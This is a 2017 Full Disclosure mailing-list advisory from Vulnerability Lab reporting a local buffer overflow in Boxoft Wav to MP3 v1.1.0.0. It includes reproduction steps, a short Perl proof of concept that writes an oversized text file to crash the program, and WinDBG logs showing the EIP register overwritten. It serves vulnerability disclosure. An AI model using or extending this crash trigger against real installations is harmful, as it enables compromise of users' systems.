[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0bb96a83-2c0e-114c-5748-5a684a94e6f5@vulnerability-lab.com>
Date: Wed, 11 Jan 2017 10:58:10 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
Document Title:
===============
Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2027
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
2027
Common Vulnerability Scoring System:
====================================
5.8
Product & Service Introduction:
===============================
Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high
quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and
convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be
converted to mp3 format automatically when the source wav files are written to a specified monitored directory.
(Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Boxoft
Product: Wav to MP3 - Player (Software) 1.1.0.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software.
The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process.
The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are
able to load special crafted files that overwrites the eip register to compromise the local system process of the software.
An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute
arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode
payload as txt file to add for the play module.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8.
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download and install the "setup(free-wav-to-mp3)" file
2. Run the poc code via active perl or perl
3. A file format "poc.txt" will be created
4. Click "ADD" and upload the (poc.txt)
Name > POC.txt
Size > 18KB
Full file name : C:UsersDellDesktopPoc.txt
5. Click "Play"
Note: Software will crash with an unhandled exception and critical access violation
6. Successful reproduce of the local buffer overflow vulnerability!
PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 9000;
open(MYFILE,'>>poc.txt');
print MYFILE $Buff;
close(MYFILE);
print "SaifAllah benMassaoud";
--- Debug Logs [WinDBG] ---
(1d10.1d3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
31347831 ?? ???
0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
0012faf4: 31347831
Invalid exception stack at 34783134
0:000> d 0012faf4
0012faf4 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb04 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb14 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb24 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb34 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb44 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb54 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb64 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0:000>kb
Following frames may be wrong.
0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
0012f7f4 00000000 00000000 78313478 00000002 0x12f810
--- [CRASH - wavtomp3.exe] ---
Problem Event Name: APPCRASH
Application Name: wavtomp3.exe
Application Version: 1.1.0.0
Application Timestamp: 2a425e19
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Code: c0000005
Exception Offset: 31347831
OS Version: 6.1.7600.2.0.0.256.1
Locale ID: 1033
Additional Information 1: e98d
Additional Information 2: e98dfca8bcf81bc1740adb135579ad53
Additional Information 3: 6eab
Additional Information 4: 6eabdd9e0dc94904be3b39a1c0583635
Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists